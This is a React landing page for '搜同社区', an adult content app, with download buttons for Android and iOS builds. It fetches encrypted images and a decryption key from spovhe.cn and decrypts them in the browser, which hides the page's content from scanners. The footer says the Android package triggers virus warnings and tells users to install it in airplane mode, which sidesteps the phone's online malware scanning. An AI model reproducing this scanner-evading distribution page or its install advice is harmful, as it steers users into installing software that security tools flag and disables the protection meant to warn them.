import { useEffect, useMemo, useState } from "react";
import type { ProductRuntime } from "@/services/productRuntime";
import { analytics } from "@/services/analytics";
import { acquisitionChannel } from "@/services/acquisitionChannel";
import "./style.css";
const A = {
  logo: "e1a59fd0-f232-4ddf-98ea-be816b9895b1",
  title: "cb6cc4af-50a1-4b32-a808-db89e03e58b5",
  android: "68a498f8-e147-474c-aa4c-e083da233c8b",
  ios: "799429b3-0fbe-4117-9ebf-b9cf876d1340",
  cards: [
    "d0e13e48-a2f4-47c8-ba52-d5c95380f7dc",
    "e4f5c291-c9dd-4f2a-965b-ead505250c00",
    "a69d0bd4-c3e6-4125-8362-deb28f2da927",
    "ffd46e86-aa44-404d-883c-826e4d57ba31",
  ],
  slides: [
    "89328469-8498-429d-a52a-b0d68d8d9ff4",
    "0d1f60ae-8b7c-45ce-bcaf-01da6b6e1d8b",
    "b8578c47-d4a8-46e9-b12b-3c09ead083d4",
    "e56a0a8f-5b48-4b08-a487-2f3dcb46e63a",
  ],
};
let kp: Promise<CryptoKey>;
const key = () =>
  (kp ??= fetch("https://spovhe.cn/v1/assets/landing/client-key").then(
    async (r) => {
      const j = await r.json(),
        b = Uint8Array.from(atob(j.data.key), (x) => x.charCodeAt(0));
      return crypto.subtle.importKey("raw", b, "AES-GCM", false, ["decrypt"]);
    },
  ));
function Pic({ id }: { id: string }) {
  const [s, setS] = useState("");
  useEffect(() => {
    let u = "";
    Promise.all([
      key(),
      fetch(`https://spovhe.cn/v1/assets/landing/${id}.enc`),
    ]).then(async ([k, r]) => {
      const b = new Uint8Array(await r.arrayBuffer()),
        n = (b[5] << 8) | b[6],
        m = new TextDecoder().decode(b.slice(19, 19 + n)),
        p = await crypto.subtle.decrypt(
          { name: "AES-GCM", iv: b.slice(7, 19) },
          k,
          b.slice(19 + n),
        );
      u = URL.createObjectURL(new Blob([p], { type: m }));
      setS(u);
    });
    return () => {
      if (u) URL.revokeObjectURL(u);
    };
  }, [id]);
  return s ? <img src={s} /> : <span className="st-sk" />;
}
type C = { androidUrl: string; iosUrl: string };
export default function Soutong({ product }: { product: ProductRuntime }) {
  const channel = useMemo(
      () => acquisitionChannel(location.pathname.split("/").filter(Boolean).at(-1) || "direct"),
      [],
    ),
    [cfg, setCfg] = useState<C | null>(null);
  useEffect(() => {
    document.title = "搜同社区";
    analytics.report("landing_view", {
      metadata: { product: product.slug, productId: product.id, channel },
    });
    const f = async (x: string) => {
      const r = await fetch(
        `/vdo-api/v1/products/${product.slug}/channels/${encodeURIComponent(x)}/config?_=${Date.now()}`,
        { cache: "no-store" },
      );
      if (!r.ok) throw 0;
      return (await r.json()).data;
    };
    f(channel)
      .catch(() => f("direct"))
      .then(setCfg);
  }, [channel, product]);
  const dl = (ios: boolean) => {
    if (!cfg) return;
    analytics.report("app_download_click", {
      metadata: {
        product: product.slug,
        productId: product.id,
        channel,
        platform: ios ? "ios" : "android",
      },
    });
    location.href = ios ? cfg.iosUrl : cfg.androidUrl;
  };
  return (
    <main className="st-page">
      <section className="st-top">
        <Pic id={A.slides[0]} />
        <header>
          <div>
            <Pic id={A.logo} />
            <p>
              <b>搜同社区</b>
              <small>做最真实的自己</small>
            </p>
          </div>
          <nav>
            <a href="https://t.me/dahe68868">商务</a>
            <a href="https://t.me/dahe68868">TG群</a>
          </nav>
        </header>
      </section>
      <section className="st-intro">
        <Pic id={A.title} />
        <p>GV / 短剧 / 动漫 / 小说　全领域成人内容平台</p>
        <small>高品质创作 / 深度剧情 / 沉浸式体验</small>
      </section>
      <section className="st-slides">
        {A.slides.map((x) => (
          <Pic id={x} key={x} />
        ))}
      </section>
      <section className="st-cards">
        {A.cards.map((x) => (
          <Pic id={x} key={x} />
        ))}
      </section>
      <footer>
        <button onClick={() => dl(true)}>
          <Pic id={A.ios} />
        </button>
        <button onClick={() => dl(false)}>
          <Pic id={A.android} />
        </button>
        <p>安卓安装包报毒解决方案 · 下载后开启飞行模式安装</p>
      </footer>
    </main>
  );
}
